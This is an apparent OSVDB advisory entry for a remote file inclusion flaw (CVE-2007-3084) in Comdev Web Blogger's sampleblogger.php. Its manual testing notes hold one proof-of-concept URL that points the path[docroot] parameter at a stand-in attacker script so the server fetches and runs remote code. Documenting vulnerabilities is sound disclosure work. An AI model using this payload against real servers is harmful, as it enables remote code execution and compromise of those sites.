Comdev Web Blogger sampleblogger.php path[docroot] Variable Remote File Inclusion

2007-06-03T19:31:25
ID OSVDB:38361
Type osvdb
Reporter OSVDB
Modified 2007-06-03T19:31:25

Description

Manual Testing Notes

http://[target]/oneadmin/blogger/sampleblogger.php?path[docroot]=http://EVILSCRIPT.txt?

References:

Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-06/0023.html ISS X-Force ID: 34683 CVE-2007-3084